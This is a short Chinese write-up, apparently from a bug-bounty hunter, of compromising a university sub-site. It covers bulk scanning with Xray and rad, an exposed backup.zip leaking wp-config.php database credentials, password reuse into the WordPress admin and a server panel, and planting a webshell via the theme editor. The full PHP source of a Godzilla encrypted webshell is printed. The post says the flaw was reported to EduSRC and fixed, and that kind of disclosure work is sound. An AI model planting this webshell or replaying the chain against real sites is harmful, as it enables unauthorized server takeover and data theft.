刚放假,闲的没事,就想着一边用Xray+rad配合红队师傅写的py脚本来批量挖掘edu漏洞
py脚本地址:点击进入
Xray地址:点击进入
rad地址:点击进入
使用详情请见 https://github.com/timwhitez/rad-xray
连续扫了几天也没啥收获,最后去看了一下漏洞报告,发现了某理工大学旁站的一个备份文件
访问 https://xxxx/backup.zip
下载备份文件
意外在wp-config.php
中发现了数据库配置信息,其中包含了数据库账号和密码
并且发现了备份了数据库,用记事本打开,发现了用户名跟md5加密后的密码
虽然md5加密的密码无法解开,但是我们可以猜测他的数据库密码跟后台密码可能一致,于是用刚刚的数据库密码和这个后台管理员账号登录,成功进入后台
在外观 -> 主题编辑器 这里发现了可以写入代码的地方,尝试写入一句话,成功写入但蚁剑无法连接,于是尝试用哥斯拉的加密马写入。密码是 pass
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (stripos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
成功连接。到这儿就已经拿到webshell了
但是扫描了一下端口,另外还发现9999端口是服务器面板,访问 https://xxxxx:9999/index.php?c=index&a=login
猜测密码肯定还是原来的密码,但是用刚刚的账户名不能登录,将账户名改为admin
密码还是刚刚的数据库的密码
成功登录服务器管理面板
(ps:该站点已提交EduSRC,并已修复)